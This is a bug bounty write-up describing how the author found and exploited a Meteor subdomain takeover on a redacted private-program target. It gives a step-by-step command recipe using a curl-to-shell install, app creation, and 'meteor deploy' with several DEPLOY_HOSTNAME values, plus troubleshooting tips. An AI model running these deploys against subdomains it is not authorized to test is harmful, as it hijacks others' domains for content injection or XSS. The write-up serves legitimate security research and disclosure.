In the name of Allah
Hi guys, I’m here again, YoungVanda. In this write-up, I’m gonna talk about Meteor Subdomain Takeover. From a simple recon to one of the trickiest exploitations of my life 😉
In this write-up, I explained everything from the beginning. If you just one to get to the exploitation part, check out the Exploitation heading at the end.
Also if you haven’t read this write-up, give it a go. It’s a good write-up and it helped me a lot during the exploitation process.
The story
It was a private program, with this scope: *.redacted.com
The first thing I do when facing a small company/target is just running Konckpy to get the vibe of the domain. Like:
How many subdomains does it have!!!
Getting familiar with subdomains and naming patterns.
Is there any test/stage subdomain!?!
I ran Knockpy and it gave me a few subdomains I just opened them manually.
- I use this Firefox extension for opening URLs manually, at the same time.
I found an interesting subdomain.
- I said OK baby. That’s fine. You’re good. Don’t worry :)
When I saw this page I said OK usually these kinda messages could be a sign of Subdomain Takeover. I’m not a big fan of Subdomain Takeover, but I said why not!!! Let’s dive into it 🔥🔥🔥
Note:
When I face such web pages and I think it might be vulnerable to Subdomain Takeover, I usually check can-i-take-over-xyz
Also, I run Nuclei for this purpose😁 Because Nuclei has lots of community templates when it comes to Subdomain Takeover.
Back to the story, I ran Nuclei, after a second Nuclei told me, You’re a lucky boy😁 Just get out here man. Get out here.
- I was confused why no one had reported this before. I got the answer, follow me.
Why no ones has reported this before?
can-i-take-over-xyz hadn’t had the Meteor Takeover in its resources.
There was no write-up about it, except one. And you could not find it with Googling.
The only write-up was placed in the Nuclei template. Even, I followed the write-up. Went step by step. But it didn’t work.
How did I find the write-up?
In every Nuclei template, there is usually extra information about it. Even the way you can exploit the vulnerability. So here is what I did to find the write-up:
- I love the reference section in templates.
cd nuclei-templates/
find . -name "template-name.yaml"
cat ./http/takeovers/template-name.yaml
Exploitation
Step — 1:
So I found the write-up, and the first thing I did according to the write-up was install Meteor:
# Other ways here: https://docs.meteor.com/install.html
# I installed this way
curl https://install.meteor.com/ | sh
- A successful installation.
Step — 2:
The next step is creating a Meteor application. I used this command:
# Execute the command with a normal user, not root.
mkdir poc && cd poc
meteor create --minimal .
Note:
For creating a Meteor application you shouldn’t be a root user. That was one of my problems, so to make this work I used my Amazon VPS with a ubuntu/normal user.
Step — 3:
So far, all the required files have been created. Go and change this file
client/main.html and put your flag there:
<platform-uesrname> POC Takeover
nano client/main.html # Put your <platform-username> POC Takeover
Step — 4:
Now, go to the www.meteor.com and sign-up. Also, take note that you should put in your payment details to be able to use the custom subdomain feature.
meteor login # Enter your username & password
Step — 5:
It’s time for the final step.
DEPLOY_HOSTNAME=[CNAME] meteor deploy [sub.target.com]
In the [CNAME] section you can put the CNAME of your subdomain.
- dig sub.target.com
But in my case, it didn’t work. You can try these:
# Didn't work for me
DEPLOY_HOSTNAME=eu-west-1.galaxy.meteor.com meteor deploy [sub.target.com]
# Didn't work for me
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy [sub.target.com]
# Worked for me
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy [sub.target.com]
How I found this galaxy.meteor.com
I was disappointed that I couldn’t take over the subdomain. Even though I spent around 10 hours, in two days, to exploit the vulnerability, I wasn’t successful. However, suddenly, I came up with an idea, but to me, this was more like a shot in the dark :)
I discussed my problem on forums.meteor.com just asking for some help :)
I explained my issue on the forum. Waiting for an answer, and after 2 or 3 days someone replied to me.
I said OK. I’m gonna give it a try. I wasn’t having that much hope.
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy travel.target.com
- Done
Finally after 2 days of exploiting and 3 days of waiting for some help. It worked!!!
Man, the moment I realised that the application was being deployed I was over the moon.
It was marvellous. Like a beautiful woman in a red dress with red lipstick
- Like this woman:
- Ohhh, my bad, sorry, I meant this one:
Ultimate Final Hot Cooking Recipe:
- Ohhh, Mamacita, what a recipe !!! Yummy 😂😂😂
# Follow the steps with normal user, not root.
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
meteor create --minimal .
nano client/main.html # Put your <platform-username> POC Takeover
meteor login # Entering username and password - Sign-up here www.meteor.com
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one: ( this oen worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Ceck out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still having problem with deploying the target. Do the trick !!!
# Go to https://forums.meteor.com and ask for some help
Severity/Priority of this Takeover
It was a private RDP program so I really tried to escalate it to High/P2 by showing the scenario of Stored XSS. But it didn’t work. They closed it as Medium/P3.
Triager said this:
- That is why they closed it as P3/Medium.
The Errors you might get during the takeover
- After installing Meteor create a directory and run the following steps on that directory
curl https://install.meteor.com/ | sh
mkdir poc && cd poc
Create the Meteor application in a new directory and as a normal user, not root. Otherwise, you gonna get this error:
Create the Meteor application as a normal user.
ubuntu@369:~/$ mkdir poc && cd poc
ubuntu@369:~/poc$ meteor create --minimal .
- The last error that you might encounter, is gonna happen while deploying the application:
dig sub.target.com # Get the CNAME
# Try this one now:
DEPLOY_HOSTNAME=CNAME meteor deploy sub.target.com
# If didn't work, try this one:
DEPLOY_HOSTNAME=galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one:
DEPLOY_HOSTNAME=u-west-1.galaxy-ingress.meteor.com meteor deploy sub.target.com
# Didn't work, try this one: ( this oen worked for me )
DEPLOY_HOSTNAME=galaxy.meteor.com meteor deploy sub.target.com
# Check out https://galaxy-guide.meteor.com/deploy-region.html for more regions
# If you still having problem with deploying the target. Do the trick !!!
# Go to https://forums.meteor.com and ask for some help
Moral Values of Story
The moment I realised that I was not able to take over the subdomain, after 7 8 hours of trying. I was really sad and just watched anime. I used to be lazy when it came to exploitation. But I didn’t give up, the next day:
I watched multiple YouTube videos. About how to deploy a Meteor application and even the Meteor itself.
Reading documents, from docs.meteor.com, just to figure out what’s going on.
Finally, when I was disappointed. I explained my problem on the forum, forums.meteor.com, I have waited for 2 or 3 days. And finally, someone answered my question and it actually worked.
Uooo man… Wait a minute, I tweet about my recent findings and some other bug bounty tips. So check out my tweeter account. Sorry X account :)
My Twitter Account: @young_vanda_